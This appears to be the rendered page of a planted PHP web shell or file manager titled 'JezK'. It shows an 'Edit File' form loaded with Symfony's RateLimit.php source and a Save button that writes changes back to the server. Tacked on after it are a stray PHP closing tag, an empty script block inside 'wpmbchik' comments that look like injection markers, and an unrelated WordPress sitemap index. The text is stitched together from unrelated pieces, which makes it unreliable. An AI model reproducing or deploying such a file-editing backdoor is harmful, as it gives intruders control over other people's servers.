
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: RateLimit.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier &lt;fabien@symfony.com&gt;
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\HttpKernel\Attribute;

use Symfony\Component\ExpressionLanguage\Expression;

/**
 * Rate limits the controller.
 *
 * @see https://symfony.com/doc/current/rate_limiter.html
 *
 * @author Ayyoub AFW-ALLAH &lt;ayyoub.afwallah@gmail.com&gt;
 */
#[\Attribute(\Attribute::IS_REPEATABLE | \Attribute::TARGET_CLASS | \Attribute::TARGET_METHOD | \Attribute::TARGET_FUNCTION)]
final class RateLimit
{
    /** @var string[] */
    public readonly array $methods;

    /**
     * @param string                          $limiter The configured limiter name
     * @param string|Expression|\Closure|null $key     A literal string key, an Expression, or a Closure (defaults to client IP + method + path)
     * @param int                             $tokens  The number of tokens to consume
     * @param string[]|string                 $methods HTTP methods to rate limit; empty means all methods
     */
    public function __construct(
        public readonly string $limiter,
        public readonly string|Expression|\Closure|null $key = null,
        public readonly int $tokens = 1,
        array|string $methods = [],
    ) {
        if ($this-&gt;tokens &lt; 1) {
            throw new \InvalidArgumentException(\sprintf('The &quot;$tokens&quot; argument of &quot;%s&quot; must be greater than 0, &quot;%d&quot; given.', self::class, $this-&gt;tokens));
        }

        if (\in_array('GET', $methods = array_map('strtoupper', (array) $methods), true)) {
            $methods[] = 'HEAD';
        }
        $this-&gt;methods = $methods;
    }
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

?>

<!-- wpmbchik -->

<script>

</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://kalam-i-haqq.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
